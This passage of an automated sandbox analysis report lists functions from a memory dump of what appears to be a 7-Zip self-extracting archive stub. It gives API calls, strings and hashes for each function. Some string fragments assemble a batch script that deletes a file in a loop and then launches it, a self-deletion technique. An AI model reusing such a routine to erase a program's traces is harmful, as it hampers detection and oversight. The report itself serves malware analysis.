GetProcAddress.KERNEL32 ref: 0000000140002348

Strings

%04X%c%04X%c, xrefs: 000000014000230C
kernel32, xrefs: 00000001400022D7, 0000000140002331
SetThreadPreferredUILanguages, xrefs: 000000014000233E
SetProcessPreferredUILanguages, xrefs: 00000001400022EE

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: 894772936f4937b711b481bb04c2a273af696cad1f90237fdae8d8223eb41ba5
Instruction ID: c83a0b667c30abcfd619a9940c4eea38dc707d73ae63cd64fb0d3cb0556ad1b4
Opcode Fuzzy Hash: 894772936f4937b711b481bb04c2a273af696cad1f90237fdae8d8223eb41ba5
Instruction Fuzzy Hash: 0031F671201B0196EB56DB93B858BE863A1B7ACFC4F598129AF0947B74EF3CC949C700

Function 0000000140003A74 Relevance: 16.6, APIs: 11, Instructions: 81filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 0000000140003AB4
lstrcmpW.KERNEL32 ref: 0000000140003B09
lstrcmpW.KERNEL32 ref: 0000000140003B1F
SetFileAttributesW.KERNEL32 ref: 0000000140003B38
DeleteFileW.KERNEL32 ref: 0000000140003B45
FindNextFileW.KERNEL32 ref: 0000000140003B57
FindClose.KERNEL32 ref: 0000000140003B68
SetFileAttributesW.KERNEL32 ref: 0000000140003B73
RemoveDirectoryW.KERNEL32 ref: 0000000140003B80
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003B8D
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003B9C

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 40327e7a4e627b576589c04b300327143c20904d628a63e6dedda5f8708aa82e
Instruction ID: 3e4da905ce96bf9f738c15ed4aea8ee97a65dc1dff7fb7a22644383a93eee8e4
Opcode Fuzzy Hash: 40327e7a4e627b576589c04b300327143c20904d628a63e6dedda5f8708aa82e
Instruction Fuzzy Hash: C2313EB1304A4191EB52DB63F8443EA63A5B7DCBD4F484225BB5A87AB5DF3CC949C700

Function 000000014000C7F4 Relevance: 16.6, APIs: 11, Instructions: 77stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32 ref: 000000014000C829
GetLastError.KERNEL32 ref: 000000014000C837
FormatMessageW.KERNEL32 ref: 000000014000C86C
FormatMessageW.KERNEL32 ref: 000000014000C899
lstrlenW.KERNEL32 ref: 000000014000C8A8
lstrlenW.KERNEL32 ref: 000000014000C8B6
??2@YAPEAX_K@Z.MSVCRT ref: 000000014000C8D9
lstrcpyW.KERNEL32 ref: 000000014000C8E9
lstrcpyW.KERNEL32 ref: 000000014000C8FF
??3@YAXPEAX@Z.MSVCRT ref: 000000014000C910
LocalFree.KERNEL32 ref: 000000014000C91A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: 30c51a8269be2602cf4b410d5b781a8e3192ff5b776fab05b052ee65ac3b21ea
Instruction ID: 2d898ceb3f09a1eb584ffa9d8366e5f01a45126dcd79849e3f4c0ff505611167
Opcode Fuzzy Hash: 30c51a8269be2602cf4b410d5b781a8e3192ff5b776fab05b052ee65ac3b21ea
Instruction Fuzzy Hash: AE318D32215A4182EB25DB52F8847EAA3A5F7DD7E1F504129FB9E43AA4EF78C4088700

Function 00000001400040F4 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 0000000140004107
SetLastError.KERNEL32 ref: 000000014000411F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: a55bb6e7dc2702947b24bbb3e5a92d34c8991f2fa135c1f2c7b83d210b82e527
Instruction ID: d1a060c4f630bfd89d2f2160516af3f9bcb3a2033bcc73bb429cd43d1ff9b7cc
Opcode Fuzzy Hash: a55bb6e7dc2702947b24bbb3e5a92d34c8991f2fa135c1f2c7b83d210b82e527
Instruction Fuzzy Hash: FF015EB020854181FB62CB67B8443E913A1AB6DBF5F540724FB7A876F6DB38C9898604

Function 000000014001DFCC Relevance: 5.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 000000014001E24F
_CxxThrowException.MSVCRT ref: 000000014001E269
_CxxThrowException.MSVCRT ref: 000000014001E31D

Part of subcall function 000000014001DACC: ??2@YAPEAX_K@Z.MSVCRT(?,?,00000000,000000014001799E), ref: 000000014001DAE6

_CxxThrowException.MSVCRT ref: 000000014001E3A3

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionThrow$??2@
String ID:
API String ID: 3392402120-0
Opcode ID: 2b3263cd92e1bb3e7898cc00a8deec63dd0b77c2faebd3789d8185054e8a1bb3
Instruction ID: f0828402b5f177350ef33b43c1acec269240831d9e3c8cbd07829b04a4968652
Opcode Fuzzy Hash: 2b3263cd92e1bb3e7898cc00a8deec63dd0b77c2faebd3789d8185054e8a1bb3
Instruction Fuzzy Hash: 8FB16977600A8482EB15DF2AD4943AD7761F788FC8F568126EB4E0BB68DF36D545C700

Function 000000014000121C Relevance: 3.0, APIs: 2, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNEL32 ref: 0000000140001240

Part of subcall function 000000014000C74C: IsWindow.USER32 ref: 000000014000C775
Part of subcall function 000000014000C74C: IsBadReadPtr.KERNEL32 ref: 000000014000C78B
Part of subcall function 000000014000C74C: ??3@YAXPEAX@Z.MSVCRT ref: 000000014000C7E0

SendMessageW.USER32 ref: 000000014000129A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@DiskFreeMessageReadSendSpaceWindow
String ID:
API String ID: 1707747161-0
Opcode ID: 2c14cbb08742c1dc98fa383900268a955b434cb97bc56c82b568867ab9d26cd1
Instruction ID: 2ea032ec4b72df50374d415269d0b5e3f8fe620ad009fccfd85bb2db6252b9f8
Opcode Fuzzy Hash: 2c14cbb08742c1dc98fa383900268a955b434cb97bc56c82b568867ab9d26cd1
Instruction Fuzzy Hash: 2D016DB021654182FB56DB67B965BD527A1E7CD3C4F901018FB0E87AB1DF3DC8958B01

Function 000000014000DDC0 Relevance: 2.6, APIs: 2, Instructions: 107COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000DDDD
memset.MSVCRT ref: 000000014000DEDB

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 90ec375b5e6c540963a155221bc9aa3d0d2991a3480f7b8e78673c81ac2eb246
Instruction ID: aa65f6db82eaf8b6fea5482ebfc5d884824075850f29287f0f629c08f148ed40
Opcode Fuzzy Hash: 90ec375b5e6c540963a155221bc9aa3d0d2991a3480f7b8e78673c81ac2eb246
Instruction Fuzzy Hash: 0841C1B361469087D371DF0AF40079EB6A4F794784F518222EF8997B95DB39C059CB10

Function 000000014001FA00 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 000000014001FA0B

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ec9423caf1f53a8875ef1c85f5d62d707c05fa489cd0e74cdad768862597afb8
Instruction ID: dfc2cb70fa74bfe19b8cd164e7a7db0a044fabddf8fa4f27e3af427a8afc0b1c
Opcode Fuzzy Hash: ec9423caf1f53a8875ef1c85f5d62d707c05fa489cd0e74cdad768862597afb8
Instruction Fuzzy Hash: 25B09230A12880E1D705AB62AC813D012A06BAC351FD00426D20986130DA6C85DA8700

Function 0000000140013940 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69b6475d7a0199148ef249fbc053a23c943e0ccf4ae01405b7bd2e1dbab77975
Instruction ID: 42128092fb2f8a7eb19b93a0a6dff0b71e4a450f07df2cf7c4e72dc6e6bf1e2d
Opcode Fuzzy Hash: 69b6475d7a0199148ef249fbc053a23c943e0ccf4ae01405b7bd2e1dbab77975
Instruction Fuzzy Hash: 97618CB76156908BC755CF3AD1807ADBBB0F749B84F48D102EB8983790E73AD8A1CB50

Function 0000000140006DE4 Relevance: 58.0, APIs: 30, Strings: 3, Instructions: 203threadprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

GetCommandLineW.KERNEL32 ref: 0000000140006E3D
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006F7E
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006F8B
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006F98
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FA5
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FB2
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FBF
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FCC
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FD9
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FE6
??3@YAXPEAX@Z.MSVCRT ref: 0000000140006FF3
GetStartupInfoW.KERNEL32 ref: 000000014000700B
CreateProcessW.KERNEL32 ref: 0000000140007055
GetLastError.KERNEL32 ref: 000000014000705F
CreateJobObjectW.KERNEL32 ref: 0000000140007072
AssignProcessToJobObject.KERNEL32 ref: 000000014000708C
CreateIoCompletionPort.KERNEL32 ref: 00000001400070A7
SetInformationJobObject.KERNEL32 ref: 00000001400070DE
ResumeThread.KERNEL32 ref: 00000001400070E9
GetQueuedCompletionStatus.KERNEL32 ref: 0000000140007118
ResumeThread.KERNEL32 ref: 0000000140007127
WaitForSingleObject.KERNEL32 ref: 0000000140007135
CloseHandle.KERNEL32 ref: 0000000140007140
GetExitCodeProcess.KERNEL32 ref: 0000000140007153
GetLastError.KERNEL32 ref: 000000014000715D
CloseHandle.KERNEL32 ref: 000000014000716F
CloseHandle.KERNEL32 ref: 000000014000717D
CloseHandle.KERNEL32 ref: 000000014000718B
??3@YAXPEAX@Z.MSVCRT ref: 000000014000719B
??3@YAXPEAX@Z.MSVCRT ref: 00000001400071A5

Strings

sfxwaitall, xrefs: 0000000140006E81
h, xrefs: 0000000140007000
" -, xrefs: 0000000140006E6A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$??2@AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
String ID: " -$h$sfxwaitall
API String ID: 2737579793-4132442212
Opcode ID: 8972559cd816c1338e3ded091cc90cf9c446310decdfcd8fdf62a62f3c69e44e
Instruction ID: 5d8256fca674a3c7c44ae29bb3de5cac8273207d5868712ab1cf101b1d6cc84f
Opcode Fuzzy Hash: 8972559cd816c1338e3ded091cc90cf9c446310decdfcd8fdf62a62f3c69e44e
Instruction Fuzzy Hash: C4A15172605A8182EB61DB62F4543EAA361F7D8BD0F408125FB8D47BAADF7DC549CB00

Function 0000000140002384 Relevance: 38.6, APIs: 21, Strings: 1, Instructions: 120windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32 ref: 00000001400023A9
GetDeviceCaps.GDI32 ref: 00000001400023BA
MulDiv.KERNEL32 ref: 00000001400023D3
GetObjectW.GDI32 ref: 000000014000240F
MulDiv.KERNEL32 ref: 000000014000241E
MulDiv.KERNEL32 ref: 000000014000242F
CreateCompatibleDC.GDI32 ref: 000000014000243A
CreateCompatibleDC.GDI32 ref: 0000000140002446
SelectObject.GDI32 ref: 0000000140002455
CreateCompatibleBitmap.GDI32 ref: 0000000140002466
SelectObject.GDI32 ref: 0000000140002472
SetStretchBltMode.GDI32 ref: 0000000140002483
StretchBlt.GDI32 ref: 00000001400024BF
GetCurrentObject.GDI32 ref: 00000001400024CD
SelectObject.GDI32 ref: 00000001400024DC
SelectObject.GDI32 ref: 00000001400024E8
DeleteDC.GDI32 ref: 00000001400024F1
DeleteDC.GDI32 ref: 00000001400024FA
ReleaseDC.USER32 ref: 0000000140002505
ReleaseDC.USER32 ref: 0000000140002515
CopyImage.USER32 ref: 000000014000252B

Strings

, xrefs: 000000014000248D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-3916222277
Opcode ID: 9cdd9486961c1ba4529f78a6b25b430b80e121a019844c0ce4569f9e424644ea
Instruction ID: 8f288d5a9edf8b55e1a971ed4cf124c8f96bcf81abbe658ec23272d680a6fed2
Opcode Fuzzy Hash: 9cdd9486961c1ba4529f78a6b25b430b80e121a019844c0ce4569f9e424644ea
Instruction Fuzzy Hash: B3415C3571478082EB158B63B898B9A7361F7D9FD5F504129EE0A43B68CF7CD88A8704

Function 00000001400048E8 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 291comCOMMON

Download Yara Rule

APIs

_wtol.MSVCRT ref: 0000000140004916
SHGetSpecialFolderPathW.SHELL32 ref: 00000001400049AD
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004AF8
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B05
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B0F
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B19
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B23
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B30
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004B3A
_wtol.MSVCRT ref: 0000000140004BB8
CoCreateInstance.OLE32 ref: 0000000140004CC9
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DC6
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DD3
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DDD
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DE5
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DEF
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004DFC
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004E06
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004E0E
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004E18

Strings

.lnk, xrefs: 0000000140004C8F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
String ID: .lnk
API String ID: 408529070-24824748
Opcode ID: c4e2908f538a9d71be7905d861048102a17b934602f3cf9aa478a877f0bf1083
Instruction ID: 3ea1a6f865d8dbae388e70ab33fc0c8faca71d452d360aa7d3c3bd685e16543f
Opcode Fuzzy Hash: c4e2908f538a9d71be7905d861048102a17b934602f3cf9aa478a877f0bf1083
Instruction Fuzzy Hash: 72E131B2218A8591EB65DF26F4507EEB365F7C87C0F504126FB8A47AAACF79C445CB00

Function 0000000140003D9C Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 107windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 0000000140003DBC
lstrcmpiA.KERNEL32 ref: 0000000140003DD5
GetWindowLongW.USER32 ref: 0000000140003DE5

Part of subcall function 0000000140003D18: GetWindowTextLengthW.USER32 ref: 0000000140003D4B
Part of subcall function 0000000140003D18: GetWindowTextW.USER32 ref: 0000000140003D73

??3@YAXPEAX@Z.MSVCRT ref: 0000000140003E1C
GetParent.USER32 ref: 0000000140003E3B
LoadLibraryA.KERNEL32 ref: 0000000140003E50
GetMenu.USER32 ref: 0000000140003E66
SetThreadLocale.KERNEL32 ref: 0000000140003E74
CreateWindowExW.USER32 ref: 0000000140003ECD
DestroyWindow.USER32 ref: 0000000140003EE2
SendMessageW.USER32 ref: 0000000140003EF7
GetSysColor.USER32 ref: 0000000140003F02
SendMessageW.USER32 ref: 0000000140003F16
SendMessageW.USER32 ref: 0000000140003F5C
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003F6A
??3@YAXPEAX@Z.MSVCRT ref: 0000000140003F74

Strings

{\rtf, xrefs: 0000000140003E01
riched20, xrefs: 0000000140003E49
STATIC, xrefs: 0000000140003DC6
RichEdit20W, xrefs: 0000000140003EBE

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 3514532227-2281146334
Opcode ID: 17c648273d71f81b2a18d2ba8a7652d8b43dd48cc0c59ee98ce1cd6ab347dc83
Instruction ID: 1bebdc077b3eb833e3d0a359812528dac203c6a0b1ab02931543c0ba43945adb
Opcode Fuzzy Hash: 17c648273d71f81b2a18d2ba8a7652d8b43dd48cc0c59ee98ce1cd6ab347dc83
Instruction Fuzzy Hash: FA513976214A84C6EB12DB66E4503EA63A5F7DCBC0F444129EB4A47BA5DF3CC949CB00

Function 000000014000722C Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 117fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32 ref: 000000014000728E
CreateFileW.KERNEL32 ref: 00000001400072D4
WriteFile.KERNEL32 ref: 00000001400073D6
??3@YAXPEAX@Z.MSVCRT ref: 00000001400073E3
CloseHandle.KERNEL32 ref: 00000001400073EB
SetFileAttributesW.KERNEL32 ref: 0000000140007407
ShellExecuteW.SHELL32 ref: 0000000140007429
??3@YAXPEAX@Z.MSVCRT ref: 0000000140007440
??3@YAXPEAX@Z.MSVCRT ref: 000000014000744A
??3@YAXPEAX@Z.MSVCRT ref: 0000000140007452

Strings

7ZSfx%03x.cmd, xrefs: 000000014000729D
if exist ", xrefs: 0000000140007346
open, xrefs: 000000014000741D
del ", xrefs: 0000000140007317, 0000000140007375
:, xrefs: 000000014000727A
\, xrefs: 0000000140007284
:Repeat, xrefs: 0000000140007306
" goto Repeat, xrefs: 0000000140007364
", xrefs: 0000000140007335, 0000000140007395

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:$:Repeat$\$del "$if exist "$open
API String ID: 3007203151-2163742583
Opcode ID: e4681752c64c186926887c9a3016e19b2cd8f3b31a8329f02ff25b6b7a014b57
Instruction ID: 0c90f25fb4aceb2cd8cb76d31abb6332663f37b5dc8e5ba106e3953ebe06db35
Opcode Fuzzy Hash: e4681752c64c186926887c9a3016e19b2cd8f3b31a8329f02ff25b6b7a014b57
Instruction Fuzzy Hash: 8C513772214A8092EB11DB52F4907EAA371F7D97C4F908116FB89879BADF7DC949CB00

Function 0000000140002554 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 106windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 000000014000256F
lstrcmpiA.KERNEL32 ref: 0000000140002589
GetWindowLongW.USER32 ref: 000000014000259D
GetMenu.USER32 ref: 00000001400025AE

Part of subcall function 000000014000222C: GetModuleHandleW.KERNEL32 ref: 0000000140002250
Part of subcall function 000000014000222C: FindResourceExA.KERNEL32 ref: 000000014000226A
Part of subcall function 000000014000222C: FindResourceExA.KERNEL32 ref: 0000000140002286
Part of subcall function 000000014000222C: SizeofResource.KERNEL32 ref: 000000014000229F
Part of subcall function 000000014000222C: LoadResource.KERNEL32 ref: 00000001400022B1
Part of subcall function 000000014000222C: LockResource.KERNEL32 ref: 00000001400022BF

GlobalAlloc.KERNEL32 ref: 00000001400025F0
memcpy.MSVCRT ref: 0000000140002607
CoInitialize.OLE32 ref: 000000014000260E
CreateStreamOnHGlobal.OLE32 ref: 0000000140002621
OleLoadPicture.OLEAUT32 ref: 0000000140002656
GlobalFree.KERNEL32 ref: 000000014000266D

Part of subcall function 0000000140002384: GetWindowDC.USER32 ref: 00000001400023A9
Part of subcall function 0000000140002384: GetDeviceCaps.GDI32 ref: 00000001400023BA
Part of subcall function 0000000140002384: MulDiv.KERNEL32 ref: 00000001400023D3
Part of subcall function 0000000140002384: GetObjectW.GDI32 ref: 000000014000240F
Part of subcall function 0000000140002384: MulDiv.KERNEL32 ref: 000000014000241E
Part of subcall function 0000000140002384: MulDiv.KERNEL32 ref: 000000014000242F
Part of subcall function 0000000140002384: CreateCompatibleDC.GDI32 ref: 000000014000243A
Part of subcall function 0000000140002384: CreateCompatibleDC.GDI32 ref: 0000000140002446
Part of subcall function 0000000140002384: SelectObject.GDI32 ref: 0000000140002455
Part of subcall function 0000000140002384: CreateCompatibleBitmap.GDI32 ref: 0000000140002466
Part of subcall function 0000000140002384: SelectObject.GDI32 ref: 0000000140002472
Part of subcall function 0000000140002384: SetStretchBltMode.GDI32 ref: 0000000140002483
Part of subcall function 0000000140002384: StretchBlt.GDI32 ref: 00000001400024BF
